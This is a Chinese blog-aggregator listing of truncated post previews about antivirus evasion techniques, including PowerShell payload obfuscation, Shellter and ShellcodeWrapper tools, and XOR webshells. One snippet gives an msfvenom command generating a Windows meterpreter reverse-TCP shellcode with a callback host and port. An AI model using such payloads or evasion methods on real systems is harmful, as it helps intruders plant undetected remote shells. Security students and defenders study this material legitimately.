基础问题回答 ####1、例举你能想到的一个后门进入到你系统中的可能方式? 在非正规网站下载盗版软件,后门隐藏在盗版软件中。 受到诱骗点击某些可执行文件(表面上是压缩包,实际上是双击自动解压执行) 2、例举你知道的后门如何启动起来(win及linux)的方式? 替换或感染系统文件 后台插入免杀进程 ...
分类:
其他好文 时间:
2021-03-30 12:57:18
阅读次数:
0
方法1:ps1免杀 共五步 总述:主要就是[Byte[]]$var_code换一种编码,然后改掉关键词,比如函数名,变量名。 1.CS生成ps1 主要改:[Byte[]]$var_code那一行 Set-StrictMode -Version 2 $DoIt = @' function func_g ...
分类:
系统相关 时间:
2020-10-27 11:47:01
阅读次数:
47
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c 将payload给copy下来 ...
分类:
编程语言 时间:
2020-07-11 09:26:03
阅读次数:
85
工具免杀 选择了几个简单或者近期还有更新的免杀工具进行学习 ShellcodeWrapper https://github.com/Arno0x/ShellcodeWrapper 该工具的原理是使用异或加密或者aes加密,做到混淆,进行免杀。 先使用msfvenom生成raw格式文件 msfveno ...
分类:
系统相关 时间:
2020-06-19 19:14:28
阅读次数:
215
深究异或webshell原理以及服务器处理免杀的流程 前言 首发合天 之前一直接触rce;但是总是可以看到过滤就可以考虑无数字和字母的webshell或者免杀马,但是今天碰到一道题,让我深刻理解了深究的重要性;不能无脑依靠网上无数字和字母的webshell了;需要知道细节;这里我们知道,常规的ctf ...
分类:
Web程序 时间:
2020-06-18 23:19:10
阅读次数:
79
1、制作exe免杀木马 前言 免杀技术全称为反杀毒技术 Anti-Virus 简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。 MSF编码 在 ...
分类:
其他好文 时间:
2020-06-02 11:20:44
阅读次数:
284
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀 官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在li ...
分类:
系统相关 时间:
2020-05-18 22:25:56
阅读次数:
371
深究异或webshell原理以及服务器处理免杀的流程 前言 之前一直接触rce;但是总是可以看到过滤就可以考虑无数字和字母的webshell或者免杀马,但是今天碰到一道题,让我深刻理解了深究的重要性;不能无脑依靠网上无数字和字母的webshell了;需要知道细节;这里我们知道,常规的ctf题目中,往 ...
分类:
Web程序 时间:
2020-05-15 00:03:35
阅读次数:
80
输入“msfvenom -l payload”查看所有的payload,找到针对mac系统的payload 回连失败的方法 回连成功的方法 ...
分类:
其他好文 时间:
2020-04-19 22:20:54
阅读次数:
73
exp3 免杀原理与实践 1.1.基础问题回答 (1)杀软是如何检测出恶意代码的? 1. 基于特征码的检测:通过检测一个文件是否包含一段或多段符合恶意代码特征的数据来判断 2. 启发式检测:通过监测软件的行为是否是常见恶意软件的行为来判断,根据片面特征去推断,缺乏精确 3. 基于行为检测:类似于是启 ...
分类:
其他好文 时间:
2020-04-04 10:03:42
阅读次数:
104
